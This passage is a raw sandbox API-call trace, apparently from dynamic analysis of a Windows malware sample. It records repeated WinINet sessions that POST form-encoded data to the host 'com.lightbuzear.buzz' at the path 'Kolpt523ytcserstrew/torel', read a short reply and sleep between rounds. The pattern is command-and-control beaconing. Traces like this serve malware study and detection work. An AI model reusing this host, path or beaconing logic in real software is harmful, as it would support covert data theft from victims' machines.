hHeap=0x4780000) returned 1 [0308.869] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbcf8 | out: hHeap=0x4780000) returned 1 [0308.869] GetProcAddress (hModule=0x71780000, lpProcName="ObtainUserAgentString") returned 0x71852f30 [0308.869] ObtainUserAgentString (in: dwOption=0x0, pszUAOut=0xdf2f4, cbSize=0xde1cc | out: pszUAOut="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)", cbSize=0xde1cc) returned 0x0 [0308.869] FreeLibrary (hLibModule=0x71780000) returned 1 [0308.869] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ef370 | out: hHeap=0x4780000) returned 1 [0308.869] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0308.869] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47ef2d0 [0308.869] InternetConnectA (hInternet=0xcc0004, lpszServerName="com.lightbuzear.buzz", nServerPort=0x1bb, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0308.870] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce6d0 [0308.870] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce750 [0308.870] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6d0 | out: hHeap=0x4780000) returned 1 [0308.870] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce5b0 [0308.870] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce750 | out: hHeap=0x4780000) returned 1 [0308.870] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce5a0 [0308.870] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5b0 | out: hHeap=0x4780000) returned 1 [0308.870] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce5c0 [0308.871] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0308.871] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x482cb10 [0308.871] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5c0 | out: hHeap=0x4780000) returned 1 [0308.871] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x482ca68 [0308.871] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482cb10 | out: hHeap=0x4780000) returned 1 [0308.871] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b590 [0308.871] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482ca68 | out: hHeap=0x4780000) returned 1 [0308.871] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x482cb10 [0308.871] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47ef410 [0308.871] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ef410 | out: hHeap=0x4780000) returned 1 [0308.871] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b590 | out: hHeap=0x4780000) returned 1 [0308.871] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47eef88 [0308.871] LoadLibraryW (lpLibFileName="Wininet.dll") returned 0x71570000 [0308.872] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47ef2f8 [0308.872] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce5b0 [0308.872] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce5e0 [0308.872] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5b0 | out: hHeap=0x4780000) returned 1 [0308.872] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce640 [0308.872] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5e0 | out: hHeap=0x4780000) returned 1 [0308.872] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce6f0 [0308.872] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce640 | out: hHeap=0x4780000) returned 1 [0308.872] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce6e0 [0308.872] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6f0 | out: hHeap=0x4780000) returned 1 [0308.872] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x482c960 [0308.872] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6e0 | out: hHeap=0x4780000) returned 1 [0308.872] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x482ca68 [0308.872] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482c960 | out: hHeap=0x4780000) returned 1 [0308.872] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b590 [0308.873] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482ca68 | out: hHeap=0x4780000) returned 1 [0308.873] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x482c960 [0308.873] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47ef168 [0308.873] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ef168 | out: hHeap=0x4780000) returned 1 [0308.873] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b590 | out: hHeap=0x4780000) returned 1 [0308.873] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="POST", lpszObjectName="Kolpt523ytcserstrew/torel", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x800000, dwContext=0x0) returned 0xcc000c [0308.873] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce670 [0308.873] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce630 [0308.873] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0308.873] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce6b0 [0308.874] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce630 | out: hHeap=0x4780000) returned 1 [0308.874] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce6f0 [0308.874] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6b0 | out: hHeap=0x4780000) returned 1 [0308.874] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce5a0 [0308.874] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6f0 | out: hHeap=0x4780000) returned 1 [0308.874] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x482c9a8 [0308.874] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0308.874] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x482c9c0 [0308.874] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482c9a8 | out: hHeap=0x4780000) returned 1 [0308.874] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b590 [0308.874] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482c9c0 | out: hHeap=0x4780000) returned 1 [0308.874] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x47ef168 [0308.874] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b590 | out: hHeap=0x4780000) returned 1 [0308.874] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbf28 [0308.874] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ef168 | out: hHeap=0x4780000) returned 1 [0308.874] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47ef168 [0308.874] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbda0 [0308.874] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47ef370 [0308.875] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbda0 | out: hHeap=0x4780000) returned 1 [0308.875] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbf28 | out: hHeap=0x4780000) returned 1 [0308.875] GetProcAddress (hModule=0x71570000, lpProcName="InternetSetOptionA") returned 0x71611dc0 [0308.875] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0xde1c8*, dwBufferLength=0x4) returned 1 [0308.876] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ef370 | out: hHeap=0x4780000) returned 1 [0308.876] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce5e0 [0308.876] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce6e0 [0308.876] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5e0 | out: hHeap=0x4780000) returned 1 [0308.876] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce5a0 [0308.876] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6e0 | out: hHeap=0x4780000) returned 1 [0308.876] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce5b0 [0308.876] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0308.876] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce710 [0308.876] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5b0 | out: hHeap=0x4780000) returned 1 [0308.876] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x482c9a8 [0308.876] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0308.876] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x482c9c0 [0308.876] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482c9a8 | out: hHeap=0x4780000) returned 1 [0308.876] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b590 [0308.876] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482c9c0 | out: hHeap=0x4780000) returned 1 [0308.876] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x47ef028 [0308.876] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b590 | out: hHeap=0x4780000) returned 1 [0308.877] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbc50 [0308.877] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ef028 | out: hHeap=0x4780000) returned 1 [0308.877] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47eefb0 [0308.877] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fba90 [0308.877] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47ef320 [0308.877] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fba90 | out: hHeap=0x4780000) returned 1 [0308.877] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbc50 | out: hHeap=0x4780000) returned 1 [0308.878] GetProcAddress (hModule=0x71570000, lpProcName="HttpSendRequestA") returned 0x71638e60 [0308.878] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders="Content-Type:application/x-www-form-urlencoded", dwHeadersLength=0x2e, lpOptional=0x47a6f78*, dwOptionalLength=0x4b2) returned 1 [0310.023] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ef320 | out: hHeap=0x4780000) returned 1 [0310.023] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce710 [0310.023] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce620 [0310.024] GetModuleHandleA (lpModuleName="Wininet.dll") returned 0x71570000 [0310.024] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce690 [0310.024] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce6f0 [0310.024] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce690 | out: hHeap=0x4780000) returned 1 [0310.024] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce6d0 [0310.024] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6f0 | out: hHeap=0x4780000) returned 1 [0310.024] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce630 [0310.024] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6d0 | out: hHeap=0x4780000) returned 1 [0310.024] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce5f0 [0310.024] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce630 | out: hHeap=0x4780000) returned 1 [0310.024] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x482ca38 [0310.024] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5f0 | out: hHeap=0x4780000) returned 1 [0310.024] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x482c9a8 [0310.024] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482ca38 | out: hHeap=0x4780000) returned 1 [0310.024] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b590 [0310.024] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482c9a8 | out: hHeap=0x4780000) returned 1 [0310.024] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x47ef320 [0310.025] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b590 | out: hHeap=0x4780000) returned 1 [0310.025] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbc50 [0310.025] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ef320 | out: hHeap=0x4780000) returned 1 [0310.025] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47ef320 [0310.025] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbcf8 [0310.025] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47ef078 [0310.025] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbcf8 | out: hHeap=0x4780000) returned 1 [0310.025] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbc50 | out: hHeap=0x4780000) returned 1 [0310.026] GetProcAddress (hModule=0x71570000, lpProcName="InternetReadFile") returned 0x715f7320 [0310.026] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xde2f4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0xde290 | out: lpBuffer=0xde2f4*, lpdwNumberOfBytesRead=0xde290*=0x5) returned 1 [0310.027] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ef078 | out: hHeap=0x4780000) returned 1 [0310.027] GetModuleHandleA (lpModuleName="Wininet.dll") returned 0x71570000 [0310.027] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce5a0 [0310.027] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce5c0 [0310.027] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0310.027] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce750 [0310.027] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5c0 | out: hHeap=0x4780000) returned 1 [0310.027] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce730 [0310.027] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce750 | out: hHeap=0x4780000) returned 1 [0310.027] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce5e0 [0310.028] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0310.028] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x482c9a8 [0310.028] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5e0 | out: hHeap=0x4780000) returned 1 [0310.028] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x482ca38 [0310.028] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482c9a8 | out: hHeap=0x4780000) returned 1 [0310.028] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b590 [0310.028] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482ca38 | out: hHeap=0x4780000) returned 1 [0310.028] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x47ef370 [0310.028] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b590 | out: hHeap=0x4780000) returned 1 [0310.028] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fb8d0 [0310.028] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ef370 | out: hHeap=0x4780000) returned 1 [0310.028] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47ef370 [0310.028] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbf28 [0310.028] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47ef398 [0310.029] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbf28 | out: hHeap=0x4780000) returned 1 [0310.029] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fb8d0 | out: hHeap=0x4780000) returned 1 [0310.029] GetProcAddress (hModule=0x71570000, lpProcName="InternetReadFile") returned 0x715f7320 [0310.029] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xde2f4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0xde290 | out: lpBuffer=0xde2f4*, lpdwNumberOfBytesRead=0xde290*=0x0) returned 1 [0310.030] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ef398 | out: hHeap=0x4780000) returned 1 [0310.030] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0310.030] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0310.030] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0310.030] FreeLibrary (hLibModule=0x71570000) returned 1 [0310.030] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce620 | out: hHeap=0x4780000) returned 1 [0310.030] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0310.030] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ef2f8 | out: hHeap=0x4780000) returned 1 [0310.031] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47eef88 | out: hHeap=0x4780000) returned 1 [0310.031] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ef2d0 | out: hHeap=0x4780000) returned 1 [0310.031] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47eec40 | out: hHeap=0x4780000) returned 1 [0310.031] Sleep (dwMilliseconds=0x2710) [0310.061] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce620 [0310.062] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce570 [0310.062] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce620 | out: hHeap=0x4780000) returned 1 [0310.062] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce6f0 [0310.062] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce570 | out: hHeap=0x4780000) returned 1 [0310.062] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce570 [0310.062] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6f0 | out: hHeap=0x4780000) returned 1 [0310.062] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce680 [0310.062] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce570 | out: hHeap=0x4780000) returned 1 [0310.062] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x482c990 [0310.062] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce680 | out: hHeap=0x4780000) returned 1 [0310.062] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x482cb28 [0310.062] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482c990 | out: hHeap=0x4780000) returned 1 [0310.062] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b4d0 [0310.062] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482cb28 | out: hHeap=0x4780000) returned 1 [0310.062] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x482c990 [0310.062] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47eec40 [0310.063] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47eec40 | out: hHeap=0x4780000) returned 1 [0310.063] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b4d0 | out: hHeap=0x4780000) returned 1 [0310.063] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47eec40 [0310.063] LoadLibraryW (lpLibFileName="Urlmon.dll") returned 0x71780000 [0310.063] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce730 [0310.064] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce630 [0310.064] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0310.064] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce570 [0310.064] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce630 | out: hHeap=0x4780000) returned 1 [0310.064] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce620 [0310.064] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce570 | out: hHeap=0x4780000) returned 1 [0310.064] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce670 [0310.064] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce620 | out: hHeap=0x4780000) returned 1 [0310.064] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x482c9a8 [0310.064] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0310.064] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x482ca38 [0310.064] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482c9a8 | out: hHeap=0x4780000) returned 1 [0310.064] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b4d0 [0310.064] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482ca38 | out: hHeap=0x4780000) returned 1 [0310.064] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x47ef410 [0310.064] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b4d0 | out: hHeap=0x4780000) returned 1 [0310.064] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fba90 [0310.065] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ef410 | out: hHeap=0x4780000) returned 1 [0310.065] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47ef2d0 [0310.065] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbe48 [0310.065] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47ef3c0 [0310.065] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbe48 | out: hHeap=0x4780000) returned 1 [0310.065] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fba90 | out: hHeap=0x4780000) returned 1 [0310.066] GetProcAddress (hModule=0x71780000, lpProcName="ObtainUserAgentString") returned 0x71852f30 [0310.066] ObtainUserAgentString (in: dwOption=0x0, pszUAOut=0xdf2f4, cbSize=0xde1cc | out: pszUAOut="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)", cbSize=0xde1cc) returned 0x0 [0310.066] FreeLibrary (hLibModule=0x71780000) returned 1 [0310.066] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ef3c0 | out: hHeap=0x4780000) returned 1 [0310.066] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0310.067] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47ef028 [0310.067] InternetConnectA (hInternet=0xcc0004, lpszServerName="com.lightbuzear.buzz", nServerPort=0x1bb, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0310.067] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce5a0 [0310.067] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce5b0 [0310.067] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0310.067] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce6c0 [0310.067] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5b0 | out: hHeap=0x4780000) returned 1 [0310.067] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce570 [0310.067] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6c0 | out: hHeap=0x4780000) returned 1 [0310.067] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce5a0 [0310.067] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce570 | out: hHeap=0x4780000) returned 1 [0310.067] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x482ca20 [0310.067] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0310.067] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x482cb40 [0310.067] HeapFree (in: 